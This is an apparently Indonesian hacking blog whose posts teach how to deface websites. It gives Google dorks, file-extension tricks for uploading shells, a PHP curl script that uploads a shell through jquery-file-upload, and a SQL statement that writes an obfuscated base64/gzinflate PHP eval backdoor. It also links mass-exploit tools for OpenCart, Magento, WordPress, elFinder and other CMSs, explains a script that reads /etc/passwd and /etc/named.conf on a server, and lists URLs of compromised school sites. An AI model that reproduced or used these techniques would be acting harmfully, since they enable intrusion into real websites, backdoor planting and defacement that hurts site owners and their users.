Codes Xploit: exploit
Pages
Showing posts with label exploit. Show all posts
Showing posts with label exploit. Show all posts

Deface High school

 
Deface High school
bingung namanya apaan. ngeliat orang show off terus gw telusuri bugnya. sebar dah ;v

dork:
intext:Welcome to our electronic class yearbook

exploit:
/forum_topic_create.php?forumid=1

upload your script in txt.

video:
https://www.youtube.com/watch?v=nnzZwihXO2o

nih hasilnya.
http://www.denfeld61.com//files_forum/18_k.txt
http://www.denfeld65.com//files_forum/253_k.txt
http://www.provinerams1969.net//files_forum/2397_k.txt
http://www.denfeld63.com/files_forum/67_k.jpg
http://www.denfeld62.com//files_forum/183_k.jpg
http://www.denfeld66.com/files_forum/27_k.txt
http://www.savannahhigh1963.com/files_forum/52_k.txt
http://www.salemhighschool1959.com/files_forum/30_k.txt
http://www.tulsamemorial64.com/files_forum/29_k.txt
http://www.lanier57.com/files_forum/137_k.txt
http://dulutheast1965.com/files_forum/23_k.txt

keep share.
gabung yuk!
group

Upload shell di cms opencart

 
kali ini ane pengen bagiin tutor upload shell di website cms opencart.
work versi 2 keatas..

cari targetnya bisa pake bruteforce disini
http://blog.indoxploit.or.id/2016/06/deface-dengan-opencart-bruteforce-and.html

langsung aja ke videonya ..
https://www.youtube.com/watch?v=CA6BvEopCEo

a.sql

SELECT '<?php eval (gzinflate(base64_decode("bZBNasNADIX3hd5hGLqIoW4OUHvIpoVCIIV0F4KRbY09MD/C1gRC8d3rcWJooaCNvqenJ4RNH4TswDP6rqgHJV8fHzBB6qmKHhxushXJdcDozVP1eTh+Zd9Ls2sCXWf0/rF/O56klueTZEdVssvz81/hBrNkTVvnparGoYfR2GJbqzxX8uU/x5w7oR3xl6+DDmw6aFrqrgpxv1aHwQmH3Ie2pDCyQN/wlbB00bIhGHibRvIWGFRhPEUWi66NRZFSS73ypbvc5DHWzrAw7QwuYCOWkdT6m+kH"))); ?>' FROM `mouwaffek_table`

thx to spyhackerz.com

Deface dengan Opencart Bruteforce and Upload image

 
Kali ini ane pengen share tool bf + upload image di opencart.

referensi:
http://spyhackerz.com/forum/threads/thewayend-opencart-twe-gif-video.1392/

script:
http://pastebin.com/vGRNXUuc

usage:
php Xploit.php target.htm

target.htm
site1.com<br>site2.com<br>site3.com

untuk pengguna windows mungkin bisa install xampp, kemudian taruh script ini di \xampp\php\
dan juga targetnya.
abis itu jalanin pake cmd.

#Keepshare.

Magento Mass Xploiter

 
yaaa sebelumynyaa exploit ini sudah di publish di web fatoni.id/malangXploit.php dengan buatan / Coded by Syncronyzer.
karena disana masih single exploiter ( masukan 1 1 ) disini gua recoded menjadi Mass Xploiter .
dengan penambahan fitur sedikit berupa:
Cek Filesystem ( ada atau tidak )
Cek Downloader ( ada + bisa login atau tidak dan juga cek permission nya apakah writeable atau tidak)
ini dia penampakannyaaa.


Link:
=> http://tools.indoxploit.or.id/?m=tools&tools=Magento_Add_Admin_Xploit&act=show
=> CLI Version [webforms,add admin] http://pastebin.com/PXkG73pG

ShellShock Exploit ( WebBased )

 
Oke sebelumnya thanks buat Evoo, yang udah membuka referensi alur exploitnya.
walaupun ini exploit lama, tapi gapapa apa salahnya di pelajarin.
oke langsung aja.
yakk ini dia sumber sedikit biar paham dulu => http://utekno.com/apakah-itu-shellshock-8349

okee jika sudah dipahami dengan benar, ini dia codenya ( versi web/webbased )
Single Xploit: http://adf.ly/1ajh3I
Auto Xploit [ update ]: http://adf.ly/1ampHK
cara pakenyaa:
1. Masukan target seperti di ss .
2. Masukan Command Linux nyaa ( contoh: uname -a/uname -rv/pwd. etc )
* kalo kalian paham command linux dasar, gua rasa gaada masalah ^_^
* pelajarin command linux :D

Video Tutorial: https://www.youtube.com/watch?v=58CxkOrB8Vg

Bypassing Extension Shell Backdoor ( jquery file upload exploit )

 
Okee kali ini gua akan bahas gimana caranyaaa mem-bypass shell kitaa, agar bisa terupload di exploit jquery file upload
okee ini dia contoh web nyaaa.

Waktu mau kita upload shell kita dengan ekstensi .php , malah begini:


Nah bagaimana cara ngatasin ituu ?
mungkin ini sedikit kuno yaa , tapi ilmu bagi yang belum tau.

Okeee ginii caranyaaa:
Cukup ubah/rename shell kalian ke ( .php.jpg, .php.gif, .php.png , dan semacamnya tinggal di kembangin aja ) , lalu upload lagi ke target kalian.


dannnnnnnn taraaaaaaaaaaaaa

Kaloo tidak bisa dibuka atau malah nge-download filenyaa mungkin sudah tidak bisa diatasi dengan cara ini lagi :3
Video Tutorial: https://www.youtube.com/watch?v=OxQxbmkhyy0

okeee sekiann dulu tutorial nya semoga bermanfaat ^_^

Salam IndoXploit

WordPress Plugins Tevolution Mass Xploiter

 
Okee gannn, kyknyaa ini exploit lagi booming banget yaaaaa. freshhhh
Thankss buat .
// Res7ock - Aan INCEF buat live targetnyaaaa :D

Ikutin aja kyk di ss gannn.
disini script nyaaaa -> http://pastebin.com/9SCkGP3h

cara pake? :
- masukin ke hosting/shell backdoor
- buka filenyaaa
- happy hackingg ^_^

Auto exploiter com_media.

 
kali ini ane pengen share auto exploiter com_media.
yaudah langsung aja.

script:
http://pastebin.com/v23UTCeu

usage: php xploit.php target.htm

edit $file, preg_match, explode

poto:



*nb: kalo udh muncul yang base64, tapi masih NO. coba manual aja.

keep sharing :)

Deface website sekolah Bangladesh

 
hallo.

kali ini ane pengen share cara deface school Bangladesh.
ya kyk bug balitbang lah kalo di indo.

Bugnya ada di plugin jquery-file-upload.
yaudah langsung aja.

dork: Developed by exdmania

script:

<?php
$file = "kkk.htm"; //shell ataupun script deface
$post = array("files[]" => "@$file",
);
$ch2 = curl_init ("http://site.com/assets/super_admin/vendor/jquery-file-upload/server/php/");
curl_setopt ($ch2, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch2, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch2, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch2, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch2, CURLOPT_POST, 1);
curl_setopt ($ch2, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch2);
echo $data."\n\n\n";
?>
POC:

hasil:
/assets/super_admin/vendor/jquery-file-upload/server/php/files/

keep share :)

Cara Deface Dengan PMB Register

 
Kali ini ane pengen share website Universitas dengan PMB Register
Umumnya setiap website universitas menyediakan tempat pendaftaran online bagi mahasiswa baru.


Oke kita langsung saja..

Dork:
inurl:"pmb."
inurl:"pmb/home/"
inurl:"pmb." intext:"pendaftaran"


1. Klik Pendaftaran Online




2. Akan muncul kolom pendaftaran dan isi semua kolom yang tersedia disitu. Untuk dibagian form upload FOTO ANDA diatas tombol KIRIM DATA  upload shell/uploader yang telah di rename ke bentuk .jpg terlebih dahulu.




3. Aktifkan tamper data klik start lalu klik tombol KIRIM DATA yang ada dibagian bawah sekali.
atau bagi yang menggunakan chrome, bisa menggunakan request maker.



4. klik tamper



5. Rename shell/uploader yang telah di rubah ke bentuk .jpg tadi  dan klik ok jika selesai.



6. selesai klik ok tadi dan akan muncul formulir pendaftaran seperti dibawah dan juga akan muncul link shell/uploader kita tadi seperti gambar dibawah. copy link-nya di bar baru dan paste.




7. inilah hasilnya




beberapa tempat upload shell di berbagai situs:
1. bagian upload foto profil.
2. bagian upload bukti pembayaran/konfirmasi.
3. bagian upload foto ijazah.
4. dll...


sumber:
http://selapancyber.blogspot.co.id/2016/04/cara-deface-website-universitas.html

WordPress U-Design Themes Mass Xploiter

 
Lansunggg aja gannn sedott sourcenyaaaa:
http://pastebin.com/t8PvtP0h


Cara Pake nyaa:
1. Masukin Toolsnya Ke Shell Backdoor / Hosting
2. Masukin Targetnya kyk di SS gan

Ini Google Dorker WP U-Design nya gan biar ga cape cari 1 1:

http://pastebin.com/YFBhSsT6

Salam IndoXploit

Lokomedia Auto Upload Shell

 
Okee gann kali ini gua akan share "Lokomedia Auto Upload Shell Backdoor"

Untuk Gunain Tools ini cukup Masukin Target nya saja => ex: http://www.target.com/
Tools ini udah otomatis Brute Login nyaaa, dan kalo berhasil Login nanti langsung auto Upload Shell ^_^


Langsung ajaa gan ini dia Sourcenyaaa => http://pastebin.com/ahBWnc0u

Mikir ada Log nyaa? itu udah Vulgar loh Mzzz Sourcenyaaaa heheheee ^_^

Salam IndoXploit

Auto Deface Cms Wordpress melalui link Config

 
Kali ini ane pengen share auto ganti title pada site cms wordpress melalui grabber configs.

jadi misalnya lu grab configs dan ternyata nemu banyak config wp. nah lu bisa gunain tool ini biar ngk capek nyelem ke db satu per satu.
ngk deface sih, tapi bisa masuk mirror kok ;v

jadi kita cuma masukin http://blabla.com/configs/

ada 2 file,
1 file untuk websitenya.
1 file untuk kita buka di cmd/terminal.

link_index.php
http://pastebin.com/7jLauxGz

ini nantinya yang kita buka pake cmd/terminal.
php link_index.php

edit filenya ya, terutama untuk link configs, link script link_title_2.php, nickname zone-h, script/kata-kata yang mau diganti di title (harus ada kata hacked)

link_title_2.php
http://pastebin.com/9jT5Qvz5

upload diwebsite yg 1 server sama configsnya.
ngk usah diedit.

POC:





















kenapa cuma ganti title ?
kenapa ngk deface aja ?
wkwk ribet bro, harus login dlu, terus nanem uploader dlu, baru deh kedeface, blm lgi klo wp-login nya disembunyiin.
jadi ganti title aja, karena ganti title cuma ganti di db, blm masuk ke sitenya.

kenapa versi cli ?
karena ini diperuntukan untuk link config wp yg banyak, makanya gw buat versi cli, klo versi website nanti server ngk kuat, alhasil cuma setengah yang kita pepes.

Videonya:https://www.youtube.com/watch?v=CKfRyqcXbwk

#KeepShare

Tool Mass Deface

 
Kali ini ane pengen bagikan script mass deface
selama ini mungkin kita cuma memakainya saja.
karena biasanya tool ini sudah tersedia di shell.

Sebenarnya script ini cukup simple.
tapi cukup bikin puyeng juga kalo belum dapet logikanya.


POC:





Script:
http://pastebin.com/SA7uKgiQ


#KeepShare

Auto dorking + exploit elFinder.

 


Kali ini ane pengen share auto dorking + exploit elFinder.
versi sebelumnya ada disini


jadi misal hasil dorkingnya
indoxploit.or.id/plugins/elfinder/files/blabla.pdf

otomatis diubah dan exploit jadi
indoxploit.or.id/plugins/elfinder/php/connector.php

klo ngk ada,
cek ke
indoxploit.or.id/plugins/elfinder/connectors/php/connector.php
pokoknya ngerubah kata - kata files

klo misalnya salah satu bisa, maka akan upload sebuah uploader.

hasil disimpan di shell_elFinder.htm

script:
http://pastebin.com/uxMFa9Bt
ubah dorknya.

Poc:



#KeepSharing
cmiiw.

Auto exploiter elFinder

 


kali ini ane pengen share auto exploiter elFinder.
sebenernya ini exploit lama.
jadi maklum klo susah dapetin target.

versi manual ada disini.
http://unitedcyberspaceofindonesia.blogspot.co.id/2014/05/cara-deface-dengan-elfinder.html

karena byk site yg ngehapus elfinder.html, elfinder.php.html, elfinder-src.php.html.

maka ane langsung ke akar tempat uploadnya (au namanya apaan, dalam hal ini connector.php khususnya elFinder.class.php)

POC:


script:
http://pastebin.com/S7Y2V19h [ CLI Version ]
http://pastebin.com/EMviZw43 [ Web Version ( Single Xploiter ) ]
http://pastebin.com/wcpevk2w [ Web Version ( Mass Xploiter ) ]

Video:
https://youtu.be/5Lnhgu4ipmc

live target:
http://beta.ealink.com/sites/all/libraries/elfinder/connectors/php/connector.php
http://chronic.stno.moph.go.th/chronic/elfinder/php/connector.php

cmiiw.

Penjelasan Tentang Tools Jumping

 


kali ini ane pengen ngasih penjelasan tentang tools Jumping.
khususnya yg ada disini https://indoxploit.blogspot.co.id/2016/01/simple-tools-for-deface.html

scriptnya ada disini..
http://pastebin.com/raw/eewrEsJY

berikut adalah penjelasannya
pertama kita buka /etc/passwd untuk baca isinya.
tapi sebelumnya kita buat dulu folder baru, soalnya kita akan membuat file .htaccess.
kita buat folder baru bernama "jump" dengan chmod 0777 dan kemudian membuat file baru bernama .htaccess dan isinya ada di variable $rrr. (filenya berada di folder yg baru tadi)

selanjutnya kita ambil user di /etc/passwd yg udh kita buka tadi. (.*?):x:...

setelah itu kita foreach, atau cek satu persatu user tsb.
apa user tersebut readable (bisa dibaca) atau tdk dengan menggunakan fungsi is_readable.

jika bisa dibaca maka kita cari nama domain dari user tsb.
dengan membaca file /etc/named.conf.

$domainns = file_get_contents("/etc/named.conf");
preg_match_all("#/var/named/(.*?).db#", $domainns, $domains);

result dari $domainns
/var/named/blabla.com.db

karena kita ngk tau kata2 blabla.com maka /var/named/(.*?).db 

kemudian kita kumpulin nama domain tsb di $domains.
terus kita brute apakah user ini, domainnya ini atau bkn dengan menggunakan fileowner
terus hingga menemukan domain yg tepat.


cukup sekian penjelasan dari ane.
mungkin kurang dimengerti atau byk kesalahan sana sini ane minta maaf. karena ane juga sama - sama masih belajar.

Script Auto Reverse IP Lookup With Python

 
Hai sob ...
Kali ini ane mau bagi script Auto Reverse IP Lookup With Python , jika pake web kan udah biasa tuh gimana kalau pakai script python kan luar biasa :p wkwkw  . Okey lanjut saja ..

Berikut Script nya


import urllib2
import re
import random


#Decoded by DayWalker
#Concat : rafsanzani.suhada99[at]gmail[dot]com
#Caranye
# Target : facebook.com <-- Target 



class reverse(object):
def run(self, target):
print ""
if target.startswith("http://"):
target = target.replace("http://", "")
elif target.startswith("https://"):
target = target.replace("https://", "")
else:
pass

 url = "http://viewdns.info/reverseip/?host=%s&t=1" % (target)

 try:
opener = urllib2.build_opener()
opener.addheaders = [('User-agent','Mozilla/5.0 (Mobile; rv:14.0) Gecko/14.0 Firefox/14.0')]
response = opener.open(url)
data = response.read()
comp = re.compile("<tr><td>\S+</td><td")
baglantilar = comp.findall(data)

 for i in baglantilar:
i = i.replace("<tr><td>", "").replace("</td><td", "")

 if i.startswith("http://"):
pass
else:
i = "http://"+i

if "Domain" not in i:
print i

except:
print "Something's went wrong .."
pass


if __name__ == '__main__':
a = raw_input("\n\t Target : ")
reverse().run(a)

print "\n IndoXploit Coders Team"
# Indoxploit Coders Team


SS testing :


Oke Terima kasih :)
DayWalker

Thx To : IndoXploit Coders Team | IDN-Crew | Madura Cyber Team |

Auto Exploiter Balitbang [Bash]

 
gila nih project sebenernya udh lama bgt,
tapi baru bisa gw selesain sekarang -,-


kali ini gw akan membagikan auto exploiter CMS Balitbang versi bash.
gw rasa lebih cepet dibanding yg versi PHP



bahan - bahan:

balit.sh => http://pastebin.com/8sCLNgDf
tambahin ini di shell kalian => http://pastebin.com/XYhgUC44
file pepesan harus ada kata Hacked.
format list target: site.com site.org site.net

videonya..
https://youtu.be/D1KS1S_2Zyk


##.

Voodoo CMS Arbitrary File Upload Xploit

 
########################################
Date Published : 12/09/2015
Exploit Author : Mr. Error 404 | IndoXploit Coders Team
Tested on : Windows XP
#########################################

Google Dork : intext:"Dise�o y Desarrollo PVS Interactive"
and Use ur brain :p
___________________________________________________



Affected URL : 
-www.target.com//voodoo-admin/uploader.php ( post: qqfile)
-www.target.com/voodoo-admin/upload.php ( post: Filedata)
-www.target.com//uploader.php (post: qqfile)
OR
-www.target.com//[PATH_CMS]//voodoo-admin/uploader.php ( post: qqfile)
-www.target.com//[PATH_CMS]/voodoo-admin/upload.php ( post: Filedata)
-www.target.com//[PATH_CMS]//uploader.php (post: qqfile)

Shell Akses: - target/voodoo-admin/files_tmp/[angka_random].php

Tools 0day Xploit => http://indoxploit.org/tools/?tools=vdocms
Input target : http://www.target.com/

Join : https://www.facebook.com/groups/indoxploitpublic/
Subscribe to Newsletter

Popular Posts

© Copyright 2017 Codes Xploit. Designed by Infinite Haxor. Distributed by Infinite Haxor.